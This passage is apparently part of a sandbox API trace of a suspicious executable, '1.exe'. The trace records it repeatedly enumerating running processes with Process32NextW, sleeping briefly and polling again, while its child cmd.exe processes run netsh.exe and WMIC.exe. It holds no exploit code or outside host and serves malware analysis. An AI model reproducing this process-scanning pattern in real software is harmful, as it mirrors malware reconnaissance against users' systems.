lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x8cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0147.215] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0147.215] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0147.216] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0147.217] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0147.217] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0147.218] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0147.219] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 1 [0147.219] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 0 [0147.220] CloseHandle (hObject=0x2e4) returned 1 [0147.220] Sleep (dwMilliseconds=0x1f4) [0147.931] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2e4 [0147.955] Process32FirstW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.956] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0147.956] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0147.957] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0147.958] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0147.958] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0147.959] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0147.960] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0147.960] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0147.961] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0147.961] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0147.962] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.963] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.963] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0147.964] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x44, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.965] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.965] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.966] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.966] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.967] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x498, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.969] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.969] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.970] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.970] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.971] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0147.972] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.972] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0147.973] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0147.974] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.974] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0147.975] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0147.975] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0147.976] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0147.977] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x8a0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0147.978] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0147.978] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0147.979] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0147.980] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0147.980] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x8cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0147.981] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0147.981] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0147.982] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0147.983] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0148.259] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0148.260] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0148.261] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 1 [0148.261] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 0 [0148.262] CloseHandle (hObject=0x2e4) returned 1 [0148.262] Sleep (dwMilliseconds=0x1f4) [0149.007] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2f8 [0149.011] Process32FirstW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.011] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0149.012] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0149.041] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0149.042] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0149.042] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0149.043] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0149.057] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0149.057] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0149.058] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0149.058] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0149.059] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.060] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.061] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0149.061] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x47, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.062] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.062] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.063] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.064] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.064] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x498, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.065] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.066] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.066] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.067] Process32NextW (in: hSnapshot=0x2f8, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, 